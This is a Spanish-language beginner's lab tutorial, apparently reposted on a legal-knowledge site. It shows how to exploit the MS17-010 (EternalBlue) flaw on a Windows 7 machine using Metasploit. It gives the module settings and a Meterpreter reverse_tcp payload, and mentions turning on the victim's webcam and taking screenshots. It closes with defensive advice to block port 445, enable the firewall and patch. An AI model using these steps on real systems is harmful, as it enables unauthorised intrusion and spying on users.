Red de conocimiento del abogados - Ley de patentes - Explotación simple de la vulnerabilidad ms17010

Explotación simple de la vulnerabilidad ms17010

(Esta es la primera vez que publico un artículo, así que no tengo experiencia, por lo que me gustaría compartir algunas experiencias de aprendizaje. Tengan paciencia conmigo y espero que todos puedan señalar mis errores).

Dron objetivo: windows7 x64 IP: 192.168.1.5

Máquina atacante: Kali Rolling (2019.3) x64 IP: 192.168.1.3

Los dos hosts están en el mismo segmento de red; win7 apaga el firewall y lo enciende en el puerto 445.

1. Utilice ipconfig/ifconfig para ver las direcciones IP de win7 y kali respectivamente.

2. Abra la herramienta msf

Cada vez que la abra, habrá una interfaz diferente

3. Utilice el comando de búsqueda para buscar ms17_010

4. Seleccione el módulo y establezca las condiciones

Use use para seleccionar el tercer módulo, puede usar 2 directamente o puede usar todos

Luego use set to establezca la IP de destino establezca rhost 192.168.1.5

Establezca la IP local establezca lhost 192.168.1.3

Establezca el puerto de escucha establezca lport 8888. Si no está configurado, el puerto predeterminado es 4444

Establecer carga útil establecer carga útil windows/x64/ meterpreter/reverse_tcp

Hay otra carga útil que se puede usar en este experimento. Puede verificarla con mostrar cargas útiles

. Finalmente, puedes usar las opciones de mostrar para verificar toda la información

5, inicia la ejecución de penetración

Espera un momento y comprueba que win ha creado la sesión con éxito

6. Después del éxito, puedes encender la cámara de Windows 7, tomar capturas de pantalla, etc.

Específico Puedes verificarlo con ayuda

1. Cerrar el puerto 445

.

2. Abra el firewall e instale el software de seguridad

3. Instale el parche correspondiente. No pondré el enlace aquí

Método para cerrar el puerto 445:

1) Abra el Panel de control----Firewall de Windows----Configuración avanzada

2) Haga clic en Nueva regla, establezca las reglas del número de puerto y asígneles un nombre (como se muestra en la imagen)

Aunque la herramienta msf es potente, sólo se puede utilizar para vulnerabilidades conocidas en los módulos que se han enviado. Debe comprender los principios de las vulnerabilidades, comprender cómo usarlas e incluso cavar agujeros usted mismo para atacar de verdad. En lugar de simplemente usar las herramientas, úselas y configúrelas.